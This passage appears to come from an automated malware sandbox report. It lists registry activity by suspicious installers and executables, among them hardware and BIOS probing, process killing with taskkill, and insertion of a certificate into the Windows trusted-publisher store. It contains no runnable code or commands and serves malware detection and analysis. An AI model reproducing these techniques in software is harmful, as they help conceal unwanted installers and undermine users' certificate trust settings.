| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
